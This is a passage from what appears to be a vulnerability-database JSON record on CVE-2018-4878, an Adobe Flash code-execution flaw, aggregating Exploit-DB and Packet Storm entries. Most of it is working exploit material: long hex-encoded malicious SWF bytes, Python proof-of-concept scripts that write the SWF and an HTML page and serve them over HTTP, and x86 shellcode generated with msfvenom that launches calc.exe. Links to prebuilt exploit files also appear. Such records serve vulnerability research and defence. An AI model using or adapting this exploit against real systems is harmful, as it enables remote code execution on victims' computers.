x24\\x00\\xAB\\x76\\x2A\\x76\\x11\\x09\\x00\\x00\\x29\\x65\\x01\\x6C\\x06\\x24\\x00\\xAB\\x76\\x11\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x48\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\x4A\\x65\\x01\\x65\\x01\\x6C\\x05\\x65\\x01\\x6C\\x02\\xA0\\x74\\x6D\\x05\\xF0\\x4B\\x65\\x01\\x24\\x00\\x74\\x6D\\x03\\x10\\xE9\\x00\\x00\\x09\\xF0\\x4E\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x05\\x46\\x4E\\x01\\x74\\x6D\\x01\\x65\\x01\\x6C\\x01\\x24\\x00\\x14\\x0A\\x00\\x00\\xF0\\x51\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x46\\x54\\x00\\x46\\x09\\x00\\x2C\\x73\\x14\\x38\\x00\\x00\\xF0\\x56\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x06\\xA0\\x65\\x01\\x6C\\x03\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x74\\x6D\\x07\\xF0\\x57\\x65\\x01\\x6C\\x08\\xC0\\x73\\x65\\x01\\x2B\\x6D\\x08\\x65\\x01\\x6C\\x08\\x24\\x01\\x0E\\x58\\x00\\x00\\x10\\x7E\\x00\\x00\\x5D\\x57\\x66\\x57\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x01\\xA0\\x61\\x44\\x5D\\x57\\x66\\x57\\x46\\x54\\x00\\x46\\x09\\x00\\x2C\\x74\\x13\\x04\\x00\\x00\\x10\\x31\\x00\\x00\\x5E\\x5F\\x5D\\x4E\\x65\\x01\\x6C\\x02\\x65\\x01\\x6C\\x06\\xA0\\x65\\x01\\x6C\\x03\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x61\\x5F\\xF0\\x63\\x65\\x01\\x6C\\x08\\xC0\\x73\\x65\\x01\\x2B\\x6D\\x08\\x65\\x01\\x6C\\x08\\x24\\x01\\x17\\x2A\\x00\\x00\\x65\\x01\\x6C\\x03\\x91\\x74\\x65\\x01\\x2B\\x6D\\x03\\xF0\\x6B\\x65\\x01\\x65\\x01\\x6C\\x05\\x24\\x04\\xA0\\x74\\x6D\\x05\\xF0\\x4C\\x65\\x01\\x6C\\x03\\x25\\x80\\x02\\x0C\\x04\\x00\\x00\\x10\\x06\\xFF\\xFF\\x65\\x01\\x6C\\x07\\x48\\xF0\\x6F\\x10\\x17\\x00\\x00\\xD0\\x30\\xD1\\x30\\x5A\\x00\\x2A\\xD6\\x2A\\x30\\x2B\\x6D\\x01\\xF0\\x71\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x24\\x00\\x48\\x01\\x46\\x84\\x06\\x8A\\x06\\x3C\\x3D\\x08\\x0D\\x00\\x01\\x01\\x00\\x0E\\x00\\x02\\x01\\x00\\x0F\\x00\\x03\\x01\\x00\\x10\\x00\\x04\\x01\\x00\\x11\\x00\\x05\\x01\\x00\\x12\\x00\\x06\\x01\\x00\\x13\\x00\\x07\\x01\\x00\\x14\\x00\\x08\\x15\\x00\\x03\\x0D\\x0D\\x04\\x05\\x86\\x03\\xD0\\x30\\x24\\x00\\x74\\x63\\x04\\x5D\\x4D\\x46\\x4D\\x00\\x29\\x5D\\x4C\\x5D\\x4D\\x66\\x4D\\x46\\x4C\\x01\\x74\\x63\\x05\\xF0\\x7C\\x5D\\x4E\\x5D\\x4E\\x5D\\x4E\\x62\\x05\\x24\\x08\\xA0\\x46\\x4E\\x01\\x24\\x14\\xA0\\x46\\x4E\\x01\\x24\\x04\\xA0\\x46\\x4E\\x01\\x5D\\x51\\x66\\x51\\x96\\x96\\x12\\x08\\x00\\x00\\x25\\xBC\\x01\\x82\\x10\\x04\\x00\\x00\\x25\\xB0\\x01\\x82\\xA0\\x74\\x63\\x06\\xF0\\x7D\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x2D\\x04\\x15\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x7F\\x62\\x06\\x24\\x04\\xA0\\x74\\x63\\x06\\xF0\\x81\\x01\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x74\\x63\\x06\\xF0\\x82\\x01\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x74\\x63\\x07\\xF0\\x83\\x01\\x5D\\x4E\\x62\\x05\\x24\\x1C\\xA0\\x46\\x4E\\x01\\x74\\x63\\x08\\xF0\\x84\\x01\\x5D\\x4E\\x62\\x05\\x24\\x20\\xA0\\x46\\x4E\\x01\\x74\\x63\\x09\\xF0\\x85\\x01\\x5D\\x47\\x66\\x47\\x5D\\x40\\x66\\x40\\x53\\x01\\x25\\x80\\x02\\x42\\x01\\x80\\x5A\\x63\\x0A\\x10\\x24\\x00\\x00\\x09\\xF0\\x88\\x01\\x62\\x0A\\x62\\x04\\x5D\\x4E\\x62\\x07\\x25\\x80\\x01\\xA1\\x62\\x04\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x61\\x53\\xF0\\x89\\x01\\x62\\x04\\x91\\x74\\x63\\x04\\xF0\\x86\\x01\\x62\\x04\\x25\\x80\\x02\\x0C\\x04\\x00\\x00\\x10\\xCC\\xFF\\xFF\\xF0\\x8B\\x01\\x62\\x0A\\x24\\x20\\x24\\x07\\xA0\\xD1\\x61\\x53\\xF0\\x8C\\x01\\x5D\\x4F\\x62\\x05\\x24\\x1C\\xA0\\xD2\\x46\\x4F\\x02\\x29\\xF0\\x8D\\x01\\x5D\\x4F\\x62\\x05\\x24\\x20\\xA0\\xD3\\x46\\x4F\\x02\\x29\\xF0\\x8E\\x01\\x5D\\x4F\\x62\\x06\\x5D\\x49\\x62\\x0A\\x46\\x49\\x01\\x25\\x80\\x01\\xA0\\x46\\x4F\\x02\\x29\\xF0\\x8F\\x01\\x5D\\x3E\\x24\\x41\\x4A\\x3E\\x01\\x80\\x3E\\x63\\x0B\\xF0\\x90\\x01\\x5D\\x4D\\x66\\x4D\\x66\\x1F\\x20\\x62\\x0B\\x46\\x20\\x02\\x82\\x63\\x0C\\xF0\\x91\\x01\\x5D\\x4F\\x62\\x06\\x62\\x07\\x46\\x4F\\x02\\x29\\xF0\\x92\\x01\\x5D\\x4F\\x62\\x05\\x24\\x1C\\xA0\\x62\\x08\\x46\\x4F\\x02\\x29\\xF0\\x93\\x01\\x5D\\x4F\\x62\\x05\\x24\\x20\\xA0\\x62\\x09\\x46\\x4F\\x02\\x29\\xF0\\x94\\x01\\x47\\x00\\x00\\x04\\x0C\\x03\\x05\\x0A\\x92\\x03\\xD0\\x30\\x57\\x2A\\xD5\\x30\\x65\\x01\\x24\\x00\\x6D\\x02\\xF0\\x98\\x01\\x65\\x01\\x20\\x80\\x3E\\x6D\\x01\\xF0\\x99\\x01\\x65\\x01\\x20\\x80\\x65\\x6D\\x03\\xF0\\x9F\\x01\\x65\\x01\\x5D\\x3F\\x66\\x3F\\x82\\x6D\\x08\\xF0\\xA0\\x01\\x65\\x01\\x20\\x85\\x6D\\x09\\xF0\\xA4\\x01\\xF0\\xA4\\x01\\x65\\x01\\x56\\x00\\x80\\x3E\\x6D\\x01\\xF0\\xA5\\x01\\x5D\\x42\\x66\\x42\\x66\\x43\\x24\\x00\\x61\\x44\\xF0\\xA6\\x01\\x65\\x01\\x24\\x00\\x73\\x6D\\x02\\x10\\x24\\x00\\x00\\x09\\xF0\\xA7\\x01\\x65\\x01\\x6C\\x01\\x5D\\x42\\x66\\x42\\x66\\x43\\x46\\x45\\x00\\x46\\x25\\x01\\x29\\xF0\\xA6\\x01\\x65\\x01\\x65\\x01\\x6C\\x02\\x24\\x04\\xA0\\x73\\x6D\\x02\\x65\\x01\\x6C\\x02\\x5D\\x42\\x66\\x42\\x66\\x43\\x66\\x46\\x15\\xCC\\xFF\\xFF\\xF0\\xA8\\x01\\x65\\x01\\x5D\\x47\\x66\\x47\\x5D\\x40\\x66\\x40\\x53\\x01\\x64\\x65\\x01\\x6C\\x01\\x41\\x01\\x80\\x66\\x6D\\x03\\xF0\\xAA\\x01\\x65\\x01\\x5D\\x49\\x65\\x01\\x6C\\x03\\x46\\x49\\x01\\x74\\x6D\\x04\\xF0\\xAC\\x01\\x65\\x01\\x5D\\x64\\x46\\x64\\x00\\x74\\x6D\\x05\\xF0\\xAD\\x01\\x65\\x01\\x6C\\x05\\x24\\x00\\x13\\x04\\x00\\x00\\x10\\x0B\\x00\\x00\\xF0\\xAF\\x01\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x5D\\x4B\\x65\\x01\\x6C\\x05\\x65\\x01\\x6C\\x04\\x65\\x01\\x6C\\x03\\x66\\x46\\x24\\x04\\xA2\\x46\\x4B\\x03\\x29\\x65\\x01\\x5D\\x4C\\x5D\\x4D\\x66\\x4D\\x46\\x4C\\x01\\x74\\x6D\\x06\\xF0\\xB4\\x01\\x65\\x01\\x5D\\x4E\\x5D\\x4E\\x65\\x01\\x6C\\x06\\x24\\x1C\\xA0\\x46\\x4E\\x01\\x24\\x08\\xA0\\x46\\x4E\\x01\\x24\\x04\\xA0\\x74\\x6D\\x06\\xF0\\xB5\\x01\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x06\\x46\\x4E\\x01\\x74\\x6D\\x07\\xF0\\xB6\\x01\\x5D\\x4F\\x65\\x01\\x6C\\x06\\x65\\x01\\x6C\\x04\\x46\\x4F\\x02\\x29\\xF0\\xB8\\x01\\x65\\x01\\x5D\\x4D\\x66\\x4D\\x20\\x5D\\x5F\\x66\\x5F\\x46\\x1F\\x02\\x82\\x6D\\x08\\xF0\\xBA\\x01\\x5D\\x4F\\x65\\x01\\x6C\\x06\\x65\\x01\\x6C\\x07\\x46\\x4F\\x02\\x29\\x47\\x10\\x18\\x00\\x00\\xD0\\x30\\xD1\\x30\\x5A\\x00\\x2A\\xD6\\x2A\\x30\\x2B\\x6D\\x01\\xF0\\xBF\\x01\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\xC2\\x01\\x47\\x01\\x35\\xF2\\x02\\xF6\\x02\\x3C\\x3D\\x09\\x29\\x00\\x01\\x1E\\x00\\x2A\\x00\\x02\\x15\\x00\\x2B\\x00\\x03\\x1A\\x00\\x2C\\x00\\x04\\x01\\x00\\x2D\\x00\\x05\\x01\\x00\\x2E\\x00\\x06\\x01\\x00\\x2F\\x00\\x07\\x01\\x00\\x30\\x00\\x08\\x00\\x00\\x31\\x00\\x09\\x32\\x00\\x05\\x08\\x01\\x05\\x06\\x0E\\xF1\\x05\\xF0\\x0C\\xD0\\x30\\xF0\\x0E\\xD0\\x49\\x00\\xF0\\x0F\\x47\\x00\\x00\\x06\\x09\\x01\\x01\\x04\\x3D\\xD0\\x30\\x10\\x05\\x00\\x00\\x41\\x05\\x03\\x58\\x04\\xF1\\x05\\xF0\\x07\\x5D\\x36\\x5D\\x37\\x66\\x37\\x10\\x04\\x00\\x00\\x16\\x1F\\x00\\x00\\x30\\x5D\\x35\\x66\\x35\\x30\\x5D\\x35\\x66\\x35\\x58\\x00\\x1D\\x26\\x11\\x06\\x00\\x00\\x47\\x70\\x45\\x0A\\x10\\xD5\\x1D\\x68\\x34\\xF1\\x05\\xF0\\x05\\x47\\x00\\x00\\x1C\\x13\\x02\\x00\\x02\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x00\\x00\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x00\\x40\\x00\\x00\\x00\"\r\n\r\n\r\nprint \"[+] CVE-2018-4878 poc \"\r\nprint \"[x] files created\"\r\n\r\nswf = \"%s.swf\" % flash_name\r\n \r\nhtml = \"\"\"\r\n<!DOCTYPE html>\r\n<html>\r\n\r\n\"\"\" + \"<embed src=\\\"\" + swf + \"\\\"></embed>\" + \"\"\"\r\n</html>\r\n\"\"\"\r\n \r\nf = open(\"%s\" % swf, \"wb\")\r\nf.write(data)\r\nf.close()\r\n \r\nf = open(\"index.html\", \"wb\")\r\nf.write(html)\r\nf.close()\r\n\r\n\r\nHandlerClass = SimpleHTTPRequestHandler\r\nServerClass = BaseHTTPServer.HTTPServer\r\nProtocol = \"HTTP/1.0\"\r\n\r\n\r\nport = 8080\r\nserver_address = ('0.0.0.0', port)\r\n\r\nHandlerClass.protocol_version = Protocol\r\nhttpd = ServerClass(server_address, HandlerClass)\r\n\r\nsa = httpd.socket.getsockname()\r\nprint \"Server ready\", sa[0], \"port\", sa[1], \"...\"\r\nhttpd.serve_forever()", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44412/"}, {"lastseen": "2018-05-24T14:25:43", "description": "Flash ActiveX 28.0.0.137 - Code Execution (2). CVE-2018-4878. Local exploit for Windows platform", "published": "2016-02-13T00:00:00", "type": "exploitdb", "title": "Flash ActiveX 28.0.0.137 - Code Execution (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4878"], "modified": "2016-02-13T00:00:00", "id": "EDB-ID:44745", "href": "https://www.exploit-db.com/exploits/44745/", "sourceData": "## CVE-2018-4878 \r\n\r\nPop up a calculator - Requires Flash ActiveX 28.0.0.137\r\n\r\nDownload: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44745.swf", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44745/"}, {"lastseen": "2018-05-24T14:25:41", "description": "Flash ActiveX 28.0.0.137 - Code Execution (1). CVE-2018-4878. Local exploit for Windows platform", "published": "2016-02-16T00:00:00", "type": "exploitdb", "title": "Flash ActiveX 28.0.0.137 - Code Execution (1)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4878"], "modified": "2016-02-16T00:00:00", "id": "EDB-ID:44744", "href": "https://www.exploit-db.com/exploits/44744/", "sourceData": "## CVE-2018-4878 (flash exploit)\r\n\r\nPop up a calculator - tested with installation of flash activeX plugin 28.0.0.137\r\n\r\nDownload: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44744.xlsx", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44744/"}], "packetstorm": [{"lastseen": "2018-04-05T01:06:57", "description": "", "published": "2018-04-04T00:00:00", "type": "packetstorm", "title": "Adobe Flash 28.0.0.137 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4878"], "modified": "2018-04-04T00:00:00", "id": "PACKETSTORM:147041", "href": "https://packetstormsecurity.com/files/147041/Adobe-Flash-28.0.0.137-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env python \n# coding: UTF-8 \nimport BaseHTTPServer \nimport sys \nfrom SimpleHTTPServer import SimpleHTTPRequestHandler \n \nprint \"@Syfi2k\" \nprint \"[+] CVE-2018-4878 poc \" \nprint \"--------------------------------\" \nprint \"Calc.exe Shellcode via Msfvenom\" \nprint \"Based on fixed version https://github.com/anbai-inc/CVE-2018-4878\" \nprint \"No Crash without executing the Shellcode, Sandbox? try it yourself\" \n \n \nbuf = \"\" \nbuf += \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\" \nbuf += \"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\" \nbuf += \"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\" \nbuf += \"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\" \nbuf += \"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\" \nbuf += \"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\" \nbuf += \"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\" \nbuf += \"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\" \nbuf += \"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\" \nbuf += \"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\" \nbuf += \"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x6a\\x01\\x8d\\x85\\xb2\\x00\" \nbuf += \"\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\" \nbuf += \"\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\" \nbuf += \"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\" \nbuf += \"\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00\" \n \npayload = buf \ndata = \"\" \nflash_name = \"movie\" \n \n \n \ndata = \"\\x46\\x57\\x53\\x20\\xE3\\x45\\x00\\x00\\x78\\x00\\x04\\xE2\\x00\\x00\\x0E\\xA6\\x00\\x00\\x18\\x01\\x00\\x44\\x11\\x19\\x00\\x00\\x00\\x7F\\x13\\x1F\\x02\\x00\\x00\\x3C\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x72\\x64\\x66\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x77\\x33\\x2E\\x6F\\x72\\x67\\x2F\\x31\\x39\\x39\\x39\\x2F\\x30\\x32\\x2F\\x32\\x32\\x2D\\x72\\x64\\x66\\x2D\\x73\\x79\\x6E\\x74\\x61\\x78\\x2D\\x6E\\x73\\x23\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x64\\x63\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x70\\x75\\x72\\x6C\\x2E\\x6F\\x72\\x67\\x2F\\x64\\x63\\x2F\\x65\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x2F\\x31\\x2E\\x31\\x22\\x20\\x72\\x64\\x66\\x3A\\x61\\x62\\x6F\\x75\\x74\\x3D\\x22\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x61\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x2F\\x78\\x2D\\x73\\x68\\x6F\\x63\\x6B\\x77\\x61\\x76\\x65\\x2D\\x66\\x6C\\x61\\x73\\x68\\x3C\\x2F\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x41\\x64\\x6F\\x62\\x65\\x20\\x46\\x6C\\x65\\x78\\x20\\x34\\x20\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x73\\x2F\\x66\\x6C\\x65\\x78\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x45\\x4E\\x3C\\x2F\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x46\\x65\\x62\\x20\\x36\\x2C\\x20\\x32\\x30\\x31\\x38\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x3E\\x0D\\x0A\\x00\\xD0\\x0F\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x10\\xE8\\x03\\x3C\\x00\\x43\\x02\\xFF\\xFF\\xFF\\xC8\\x0A\\x66\\x6C\\x61\\x73\\x68\\x30\\x32\\x00\\xFF\\x15\\x82\\x0B\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\" \n \n \nfiller = 2940 - len(payload) \n \ndata = data + payload + \"\\x90\" * filler \n \n \ndata = data + \"\\x13\\x0E\\x01\\x00\\x02\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x00\\xBF\\x14\\xB6\\x06\\x00\\x00\\x01\\x00\\x00\\x00\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x00\\x10\\x00\\x2E\\x00\\x02\\x00\\x28\\x8E\\xCD\\xBD\\x06\\xAD\\xCA\\x75\\x8F\\xCD\\xBD\\x06\\xAE\\xE4\\xE0\\x03\\x8E\\xCD\\xBD\\x06\\xFC\\xE2\\x75\\x8E\\xCD\\xBD\\x06\\xFE\\xF0\\x75\\x8E\\xCD\\xBD\\x06\\xF8\\xF8\\x75\\x8F\\xCD\\xBD\\x06\\xF9\\xFE\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF8\\xDE\\x75\\x89\\xCD\\xBD\\x06\\xDC\\xB6\\xCD\\x02\\xD6\\xF6\\x68\\x8F\\xCD\\xBD\\x06\\xFA\\xE6\\xCD\\x03\\x8F\\xCD\\xBD\\x06\\xF5\\xDC\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF1\\xDC\\x74\\x8F\\xCD\\xBD\\x06\\xD1\\xBA\\xFD\\x02\\x8F\\xCD\\xBD\\x06\\xEC\\xDC\\xCD\\x03\\x8E\\xCD\\xBD\\x06\\xEF\\xE4\\x75\\x8E\\xCD\\xBD\\x06\\xEE\\xF8\\x75\\x8E\\xCD\\xBD\\x06\\xE9\\xF0\\x75\\x89\\xCD\\xBD\\x06\\xEE\\xE6\\xDD\\x03\\xFF\\xD0\\x69\\x8F\\xCD\\xBD\\x06\\xCB\\xAA\\xC9\\x02\\x93\\xCD\\xBD\\x06\\x00\\x55\\x07\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x05\\x76\\x61\\x72\\x5F\\x31\\x00\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x76\\x61\\x72\\x5F\\x32\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x06\\x64\\x61\\x74\\x61\\x31\\x34\\x06\\x64\\x61\\x74\\x61\\x31\\x35\\x3C\\x43\\x3A\\x5C\\x55\\x73\\x65\\x72\\x73\\x5C\\x4D\\x69\\x68\\x61\\x5C\\x41\\x64\\x6F\\x62\\x65\\x4D\\x69\\x6E\\x65\\x50\\x6F\\x43\\x5F\\x74\\x72\\x79\\x69\\x6E\\x67\\x54\\x6F\\x45\\x76\\x61\\x64\\x65\\x53\\x65\\x63\\x53\\x6F\\x6C\\x75\\x74\\x69\\x6F\\x6E\\x73\\x66\\x6C\\x61\\x30\\x31\\x2E\\x61\\x73\\x05\\x64\\x61\\x74\\x61\\x32\\x05\\x64\\x61\\x74\\x61\\x33\\x09\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x06\\x45\\x6E\\x64\\x69\\x61\\x6E\\x0D\\x4C\\x49\\x54\\x54\\x4C\\x45\\x5F\\x45\\x4E\\x44\\x49\\x41\\x4E\\x06\\x65\\x6E\\x64\\x69\\x61\\x6E\\x0C\\x43\\x61\\x70\\x61\\x62\\x69\\x6C\\x69\\x74\\x69\\x65\\x73\\x0C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x73\\x79\\x73\\x74\\x65\\x6D\\x07\\x76\\x65\\x72\\x73\\x69\\x6F\\x6E\\x01\\x2C\\x01\\x20\\x07\\x72\\x65\\x70\\x6C\\x61\\x63\\x65\\x21\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x41\\x53\\x33\\x2F\\x32\\x30\\x30\\x36\\x2F\\x62\\x75\\x69\\x6C\\x74\\x69\\x6E\\x05\\x73\\x70\\x6C\\x69\\x74\\x05\\x41\\x72\\x72\\x61\\x79\\x0C\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2E\\x61\\x73\\x24\\x30\\x14\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x53\\x70\\x72\\x69\\x74\\x65\\x24\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x43\\x6F\\x6E\\x74\\x61\\x69\\x6E\\x65\\x72\\x1F\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x49\\x6E\\x74\\x65\\x72\\x61\\x63\\x74\\x69\\x76\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x65\\x76\\x65\\x6E\\x74\\x73\\x3A\\x45\\x76\\x65\\x6E\\x74\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x65\\x72\\x00\\x06\\x4E\\x75\\x6D\\x62\\x65\\x72\\x07\\x63\\x6C\\x61\\x73\\x73\\x5F\\x31\\x05\\x76\\x61\\x72\\x5F\\x33\\x0F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x0A\\x69\\x73\\x44\\x65\\x62\\x75\\x67\\x67\\x65\\x72\\x05\\x76\\x61\\x72\\x5F\\x34\\x07\\x66\\x6C\\x61\\x73\\x68\\x31\\x30\\x05\\x76\\x61\\x72\\x5F\\x35\\x0F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x04\\x76\\x6F\\x69\\x64\\x05\\x43\\x6C\\x61\\x73\\x73\\x17\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\